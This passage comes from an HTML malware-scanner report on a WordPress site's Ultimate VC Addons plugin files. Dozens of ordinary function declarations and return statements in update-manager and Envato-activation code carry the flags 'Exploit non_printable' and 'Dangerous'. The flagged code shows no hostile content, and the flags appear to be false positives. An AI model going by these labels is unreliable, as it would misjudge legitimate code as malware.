</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function (</span><span style="color: #0000BB">e</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function ($) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function () {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function (</span><span style="color: #0000BB">i</span><span style="color: #007700">, </span><span style="color: #0000BB">nav</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 739</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function (</span><span style="color: #0000BB">event</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 755</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function (</span><span style="color: #0000BB">result</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 928</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functionality</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_366").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/admin/bsf-core/BSF_Update_Manager.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 20.42 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 41</span><br><table id="file_367" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$reply</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">BSF_Update_Manager</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 103</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$_transient_data</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 106</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">brainstorm_update_themes_transient</span><span style="color: #007700">( </span><span style="color: #0000BB">$_transient_data </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 157</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True </span><span style="color: #007700">- IF </span><span style="color: #0000BB">updates are to be enabled</span><span style="color: #007700">. </span><span style="color: #0000BB">False </span><span style="color: #007700">if </span><span style="color: #0000BB">updates are to be disabled</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 159</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">enable_auto_updates</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 160</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">"bsf_enable_product_autoupdates_</span><span style="color: #007700">{</span><span style="color: #0000BB">$product_id</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">, </span><span style="color: #0000BB">true </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">object $_data</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 174</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_plugin_information</span><span style="color: #007700">( </span><span style="color: #0000BB">$_data</span><span style="color: #007700">, </span><span style="color: #0000BB">$_action </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$_args </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 178</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$_data</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 232</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_is_product_bundled</span><span style="color: #007700">( </span><span style="color: #0000BB">$bsf_product</span><span style="color: #007700">, </span><span style="color: #0000BB">$search_by </span><span style="color: #007700">= </span><span style="color: #DD0000">'id' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 261</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$product_parent</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 264</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_package_uri</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 278</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 287</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$download_path</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 291</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_update_transient_data</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_type </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 330</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$update_required</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 337</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return Array </span><span style="color: #0000BB">of plugins</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 339</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">prepare_plugins_for_update</span><span style="color: #007700">( </span><span style="color: #0000BB">$plugins </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$plugins</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_maybe_force_check_bsf_product_updates</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">brainstorm_update_plugins_transient</span><span style="color: #007700">( </span><span style="color: #0000BB">$_transient_data </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 363</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">use_beta_version</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 371</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 377</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 383</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">beta_version_normalized</span><span style="color: #007700">( </span><span style="color: #0000BB">$beta </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 388</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$version</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 391</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_allow_beta_updates</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 392</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">"bsf_allow_beta_updates_</span><span style="color: #007700">{</span><span style="color: #0000BB">$product_id</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 395</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_plugin_slug</span><span style="color: #007700">( </span><span style="color: #0000BB">$template </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 399</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$slug</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 405</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_update_display_license_link</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 448</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">brainstorm_all_products</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$all_products</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_add_registration_message</span><span style="color: #007700">( </span><span style="color: #0000BB">$plugin_data</span><span style="color: #007700">, </span><span style="color: #0000BB">$response </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 501</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_beta_update_message</span><span style="color: #007700">( </span><span style="color: #0000BB">$plugin_data</span><span style="color: #007700">, </span><span style="color: #0000BB">$response </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 515</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_beta_version</span><span style="color: #007700">( </span><span style="color: #0000BB">$version </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 516</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strpos</span><span style="color: #007700">( </span><span style="color: #0000BB">$version</span><span style="color: #007700">, </span><span style="color: #DD0000">'beta' </span><span style="color: #007700">) ||</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 520</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_change_no_package_message</span><span style="color: #007700">( </span><span style="color: #0000BB">$reply</span><span style="color: #007700">, </span><span style="color: #0000BB">$package</span><span style="color: #007700">, </span><span style="color: #0000BB">$current </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 538</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$reply</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 591</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">parameter</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_367").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/admin/bsf-core/BSF_Envato_Activate.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 13.29 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 24</span><br><table id="file_368" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$BSF_Envato_Activate</span><span style="color: #007700">-></span><span style="color: #0000BB">envato_register</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 219</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">envato_activation_url</span><span style="color: #007700">( </span><span style="color: #0000BB">$form_data </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 230</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$envato_activation_url</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_redirect_url</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 251</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$current_url</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">create_token</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 258</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$token</span><span style="color: #007700">;</span>
</span>
